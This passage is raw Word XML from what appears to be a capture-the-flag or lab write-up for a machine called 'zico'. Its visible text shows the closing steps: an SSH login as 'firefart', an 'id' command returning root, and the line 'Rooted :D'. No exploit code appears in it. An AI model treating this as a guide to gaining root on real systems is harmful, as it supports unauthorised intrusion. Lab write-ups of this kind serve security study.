          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400BD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">firefart@10.0.0.19's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B40E6" w14:textId="77777777" w:rsidR="00400BD5" w:rsidRPr="00400BD5" w:rsidRDefault="00400BD5" w:rsidP="00400BD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400BD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>firefart@zico:~# id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113584A9" w14:textId="77777777" w:rsidR="00400BD5" w:rsidRPr="00400BD5" w:rsidRDefault="00400BD5" w:rsidP="00400BD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400BD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>uid=0(firefart) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31257E73" w14:textId="4D2EF759" w:rsidR="00400BD5" w:rsidRDefault="00400BD5" w:rsidP="00400BD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400BD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>firefart@zico:~#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F5547" w14:textId="77777777" w:rsidR="00D36760" w:rsidRDefault="00D36760" w:rsidP="00400BD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C572B28" w14:textId="3FFE1205" w:rsidR="00D36760" w:rsidRDefault="00EA7B7E" w:rsidP="00400BD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7A1B019" wp14:editId="6C3DC303">
            <wp:extent cx="5466080" cy="4368800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="MyShit:Users:mee:Desktop:img:2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hit:Users:mee:Desktop:img:23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1C64" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00400BD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327BE240" w14:textId="55A37462" w:rsidR="00EA7B7E" w:rsidRPr="00E71325" w:rsidRDefault="00EA7B7E" w:rsidP="00400BD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Rooted :D</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EA7B7E" w:rsidRPr="00E71325" w:rsidSect="00E01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C1"/>
    <w:rsid w:val="00090755"/>
    <w:rsid w:val="000E3618"/>
    <w:rsid w:val="000F69EC"/>
    <w:rsid w:val="001140E1"/>
    <w:rsid w:val="00121AFC"/>
    <w:rsid w:val="00195272"/>
    <w:rsid w:val="001A2A06"/>
    <w:rsid w:val="001A5773"/>
    <w:rsid w:val="001C1291"/>
    <w:rsid w:val="002460A9"/>
    <w:rsid w:val="002465A5"/>
    <w:rsid w:val="00330878"/>
    <w:rsid w:val="003463D8"/>
    <w:rsid w:val="00367836"/>
    <w:rsid w:val="0038192C"/>
    <w:rsid w:val="00390966"/>
    <w:rsid w:val="003A7A87"/>
    <w:rsid w:val="00400BD5"/>
    <w:rsid w:val="004254E9"/>
    <w:rsid w:val="004359C8"/>
    <w:rsid w:val="00454E34"/>
    <w:rsid w:val="00470CAB"/>
    <w:rsid w:val="004B5429"/>
    <w:rsid w:val="005879DD"/>
    <w:rsid w:val="00590797"/>
    <w:rsid w:val="00595D6B"/>
    <w:rsid w:val="005A467E"/>
    <w:rsid w:val="005B04D0"/>
    <w:rsid w:val="005C021F"/>
    <w:rsid w:val="0060282C"/>
    <w:rsid w:val="00630904"/>
    <w:rsid w:val="006552F8"/>
    <w:rsid w:val="006778EB"/>
    <w:rsid w:val="00682FE7"/>
    <w:rsid w:val="00691A37"/>
    <w:rsid w:val="006E76C1"/>
    <w:rsid w:val="007461B4"/>
    <w:rsid w:val="00785E27"/>
    <w:rsid w:val="0078631D"/>
    <w:rsid w:val="007C0527"/>
    <w:rsid w:val="007D628B"/>
    <w:rsid w:val="00886200"/>
    <w:rsid w:val="008B1499"/>
    <w:rsid w:val="008E2804"/>
    <w:rsid w:val="008E52F6"/>
    <w:rsid w:val="00915665"/>
    <w:rsid w:val="009F7588"/>
    <w:rsid w:val="00A056DD"/>
    <w:rsid w:val="00AA10FC"/>
    <w:rsid w:val="00AA15D5"/>
    <w:rsid w:val="00AE48A5"/>
    <w:rsid w:val="00AF23D2"/>
    <w:rsid w:val="00B44AC0"/>
    <w:rsid w:val="00B50E5D"/>
    <w:rsid w:val="00B664F0"/>
    <w:rsid w:val="00BA0453"/>
    <w:rsid w:val="00C042D4"/>
    <w:rsid w:val="00C0781A"/>
    <w:rsid w:val="00C1157A"/>
    <w:rsid w:val="00C71A9E"/>
    <w:rsid w:val="00D36760"/>
    <w:rsid w:val="00D5094F"/>
    <w:rsid w:val="00DA70B9"/>
    <w:rsid w:val="00DB4F1B"/>
    <w:rsid w:val="00E01321"/>
    <w:rsid w:val="00E20ADE"/>
    <w:rsid w:val="00E65220"/>
    <w:rsid w:val="00E71325"/>
    <w:rsid w:val="00EA4600"/>
    <w:rsid w:val="00EA7B7E"/>
    <w:rsid w:val="00EB336B"/>
    <w:rsid w:val="00F11CB5"/>
    <w:rsid w:val="00F12664"/>
    <w:rsid w:val="00F175D8"/>
    <w:rsid w:val="00F376E6"/>
    <w:rsid w:val="00FA7C2C"/>
    <w:rsid w:val="00FC4141"/>
    <w:rsid w:val="00FC5D91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F7A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58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2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88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71A9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62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5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58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2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88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71A9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62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5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2744</Words>
  <Characters>15645</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>130</Lines>
  <Paragraphs>36</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>co</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>18353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 mee</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mee mee</cp:lastModifiedBy>
  <cp:revision>69</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-22T18:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-26T05:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>